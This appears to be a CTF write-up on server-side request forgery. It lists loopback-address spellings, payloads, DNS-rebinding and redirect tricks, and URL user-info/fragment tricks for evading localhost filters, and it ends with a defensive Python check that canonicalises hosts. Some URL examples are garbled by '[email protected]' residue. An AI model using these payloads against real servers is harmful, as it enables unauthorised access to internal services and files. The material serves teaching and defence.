1. Bypass localhost and 127.0.0.1
When the program blocks the literal strings localhost and 127.0.0.1, we can use alternative numeric representations of the same address to bypass the check:
http://0x7F.0.0.1 // hexadecimal octet
http://0177.0.0.1 // octal octet
http://2130706433 // decimal integer form
http://0x7F000001 // hexadecimal integer form
http://127.1 // shortened form
http://127.127.127.127 // any address in the loopback CIDR range 127.0.0.0/8 bypasses a localhost check
http://0 // the special address 0
http://0.0.0.0
http://[::1] // IPv6 loopback address
IP-to-hexadecimal conversion tool: https://tool.520101.com/wangluo/jinzhizhuanhuan
Number base conversion tool: https://www.sojson.com/hexconvert.html
2. CTFSHOW example questions:
2.1 Directly exploit the SSRF vulnerability to read the flag locally:
Payload: url=http://127.0.0.1/ctf/ssrf/flag.php
Payload: url=file:///C:/phpstudy/phptutorial/www/ctf/ssrf/1.txt
2.2 Bypass localhost and 127.0.0.1
Payload: url=http://127.127.127.127/ctf/ssrf/flag.php
2.3 Bypass filters on localhost, 0 and 1
(1) DNS rebinding:
http://test.com -> 127.0.0.1
A public domain name whose record resolves to 127.0.0.1:
https://blog.csdn.net/lovelyelfpop/article/details/107306577
(2) 302 redirect:
header("Location:http://127.0.0.1/flag.php");
Payload: url=http://safe.taobao.com/ctf/ssrf/flag.php
2.4 Bypassing restricted URLs
Useful behaviour of # and @ in URLs:
Example: https://www.baidu.com#www.qq.com
https://[email protected]
http://[email protected] // actually requests www.qq.com (the part before @ is treated as user info)
http://www.baidu.com#www.qq.com // actually requests www.baidu.com (the part after # is a fragment)
Payload: url=http://[email protected]/ctf/ssrf/flag.php#show
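As an added defender-side example (not code from the original write-up): a Python check that canonicalises the host of a submitted URL before comparing it against internal address ranges, so the alternative spellings from section 1 and the user@host / #fragment tricks from 2.4 all reach the same verdict. The helper names are my own; DNS names are deliberately left to the caller, for the rebinding reason noted in 2.3.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One dotted part as inet_aton reads it: hex (0x..), octal (leading 0) or decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def parse_ipv4_legacy(host: str):
    """Parse an IPv4 literal the way inet_aton does: 1 to 4 parts, each decimal,
    octal or hex, with the last part filling all remaining bytes. Returns an
    IPv4Address, or None when host is not such a literal (e.g. a DNS name)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    nums = []
    for p in parts:
        if p[:2].lower() == "0x":
            nums.append(int(p, 16))
        elif len(p) > 1 and p[0] == "0":
            nums.append(int(p, 8))
        else:
            nums.append(int(p, 10))
    tail_bytes = 5 - len(nums)  # how many of the 4 bytes the last part covers
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | nums[-1]
    return ipaddress.IPv4Address(value)


def host_address(url: str):
    """IP object for the URL's host in any spelling, or None for a DNS name.
    urlsplit discards the user@ prefix and the #fragment, so a URL like
    http://www.baidu.com@127.0.0.1/x#y yields the host 127.0.0.1."""
    host = urlsplit(url).hostname or ""
    try:
        return ipaddress.ip_address(host)  # plain dotted quad and [::1]
    except ValueError:
        return parse_ipv4_legacy(host)  # 0x7F.0.0.1, 0177.0.0.1, 127.1, 0 ...


def is_internal_address(addr) -> bool:
    """Loopback, unspecified (0.0.0.0 / ::), private or link-local space."""
    return bool(addr.is_loopback or addr.is_unspecified
                or addr.is_private or addr.is_link_local)


def is_internal_target(url: str) -> bool:
    """True when the URL's host literal points at internal address space.
    A DNS name returns False here: resolve it, pass every returned address
    through is_internal_address, and connect to that checked address rather
    than re-resolving the name, otherwise DNS rebinding defeats the check."""
    addr = host_address(url)
    return addr is not None and is_internal_address(addr)
```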